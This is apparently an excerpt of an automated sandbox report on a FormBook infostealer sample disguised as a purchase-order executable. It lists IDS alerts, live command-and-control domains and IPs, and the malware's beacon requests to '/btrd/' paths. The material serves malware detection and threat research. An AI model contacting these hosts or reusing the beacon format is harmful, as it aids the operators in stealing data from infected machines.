Source:	Binary string: cmstp.pdb source: RegAsm.exe, 00000007.00000002.2235793612.0000000001540000.00000040.10000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3365281971.0000000000220000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: explorer.exe, 00000008.00000002.3389406505.0000000010A9F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3367455817.0000000004C8F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3365692981.000000000293B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: RegAsm.exe, 0000001B.00000002.2433869260.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436801979.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, msdt.exe, 00000025.00000002.2526883807.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824411296.0000000000E80000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: RegAsm.exe, 00000034.00000002.2729173666.0000000002940000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732547455.0000000000960000.00000040.80000000.00040000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49995 -> 104.21.93.17:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49995 -> 104.21.93.17:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49995 -> 104.21.93.17:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50000 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50000 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50000 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50006 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50006 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50006 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49882 -> 192.243.59.20:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49882 -> 192.243.59.20:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49882 -> 192.243.59.20:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49992 -> 34.205.242.146:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49992 -> 34.205.242.146:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49992 -> 34.205.242.146:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.cnoszirzbkaqz.com/btrd/

Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /btrd/?8pn=ChvLWF0pZdjL9&orD=G5lr6//zQ7aMiplq1GdUNb9GEJVmzQOhD2w3hHYWxcuiBbLjkdh8uX+W8X62ffIzaE+7zSgsRw== HTTP/1.1Host: www.emeraldsurrogatefabric.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /btrd/?orD=Eh2Xpu8l9dqABVqMRkelxcAdaQWRauo4zIVE3zjkUJjpFQNmsYxfVbqaI7I2lWlUEjDmoepSbg==&8pn=ChvLWF0pZdjL9 HTTP/1.1Host: www.pure1027.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /btrd/?8pn=ChvLWF0pZdjL9&orD=1hanRQkKsw2EpQWVKCl4LROlWZtcCFpSARtuzqwGSwLi36Og4ncRpLu12qyBMcT+6ho6oQQ/oA== HTTP/1.1Host: www.thecolourgrey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /btrd/?orD=sqRP0a8aV68K6FqJqAk+hHqxgWstkLnSX2TzjpZXqgEq2vKFORbsNIdmsOuhVtdKxSDXL4nXjg==&8pn=ChvLWF0pZdjL9 HTTP/1.1Host: www.anangtoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 34.205.242.146 34.205.242.146
Source: Joe Sandbox View	IP Address: 192.243.59.20 192.243.59.20
Source: Joe Sandbox View	IP Address: 192.243.59.20 192.243.59.20

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: ADVANCEDHOSTERS-ASNL ADVANCEDHOSTERS-ASNL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 8_2_1135CF82 getaddrinfo,setsockopt,recv,

8_2_1135CF82

Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /btrd/?8pn=ChvLWF0pZdjL9&orD=G5lr6//zQ7aMiplq1GdUNb9GEJVmzQOhD2w3hHYWxcuiBbLjkdh8uX+W8X62ffIzaE+7zSgsRw== HTTP/1.1Host: www.emeraldsurrogatefabric.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /btrd/?orD=Eh2Xpu8l9dqABVqMRkelxcAdaQWRauo4zIVE3zjkUJjpFQNmsYxfVbqaI7I2lWlUEjDmoepSbg==&8pn=ChvLWF0pZdjL9 HTTP/1.1Host: www.pure1027.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /btrd/?8pn=ChvLWF0pZdjL9&orD=1hanRQkKsw2EpQWVKCl4LROlWZtcCFpSARtuzqwGSwLi36Og4ncRpLu12qyBMcT+6ho6oQQ/oA== HTTP/1.1Host: www.thecolourgrey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /btrd/?orD=sqRP0a8aV68K6FqJqAk+hHqxgWstkLnSX2TzjpZXqgEq2vKFORbsNIdmsOuhVtdKxSDXL4nXjg==&8pn=ChvLWF0pZdjL9 HTTP/1.1Host: www.anangtoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1485 HTTP/1.1Host: youngonven.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: youngonven.com
Source: global traffic	DNS traffic detected: DNS query: www.emeraldsurrogatefabric.com
Source: global traffic	DNS traffic detected: DNS query: www.pure1027.com
Source: global traffic	DNS traffic detected: DNS query: www.thecolourgrey.com
Source: global traffic	DNS traffic detected: DNS query: www.anangtoto.com
Source: global traffic	DNS traffic detected: DNS query: www.0757hunyin.net
Source: global traffic	DNS traffic detected: DNS query: www.texanboxes.com

Source: explorer.exe, 00000008.00000000.2185822168.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000008.00000000.2185822168.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000008.00000000.2185822168.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000008.00000000.2185822168.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000008.00000002.3377674269.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000008.00000000.2180118675.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3367289730.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3374312359.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2174149800.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 0000000C.00000002.2329293185.0000000002701000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2403280656.00000000022EC000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2493397578.0000000002351000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 00000026.00000002.2612943933.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 0000002E.00000002.2700394567.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 00000036.00000002.2785236388.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 0000003F.00000002.2864011147.0000000002911000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 00000047.00000002.2995542174.000000000337C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.0757hunyin.net
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.0757hunyin.net/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.0757hunyin.net/btrd/www.texanboxes.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.0757hunyin.netReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anangtoto.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anangtoto.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anangtoto.com/btrd/www.0757hunyin.net
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anangtoto.comReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cnoszirzbkaqz.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cnoszirzbkaqz.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cnoszirzbkaqz.com/btrd/www.thebestanglephotography.online
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cnoszirzbkaqz.comReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.emeraldsurrogatefabric.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.emeraldsurrogatefabric.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.emeraldsurrogatefabric.com/btrd/www.pure1027.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.emeraldsurrogatefabric.comReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.invest247on.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.invest247on.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.invest247on.com/btrd/www.xmentorgroup.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.invest247on.comReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.martline.website
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.martline.website/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.martline.website/btrd/www.naddafornadda.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.martline.websiteReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.naddafornadda.com
Source: explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.naddafornadda.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.naddafornadda.comReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.outletivo.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.outletivo.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.outletivo.com/btrd/www.martline.website
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.outletivo.comReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pure1027.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pure1027.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pure1027.com/btrd/www.thecolourgrey.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pure1027.comReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rd8.online
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rd8.online/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rd8.online/btrd/www.researchforhighschool.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rd8.onlineReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.researchforhighschool.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.researchforhighschool.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.researchforhighschool.com/btrd/www.invest247on.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.researchforhighschool.comReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texanboxes.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texanboxes.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texanboxes.com/btrd/www.watch2movie.xyz
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texanboxes.comReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thebestanglephotography.online
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thebestanglephotography.online/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thebestanglephotography.online/btrd/www.rd8.online
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thebestanglephotography.onlineReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thecolourgrey.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thecolourgrey.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thecolourgrey.com/btrd/www.anangtoto.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thecolourgrey.comReferer:
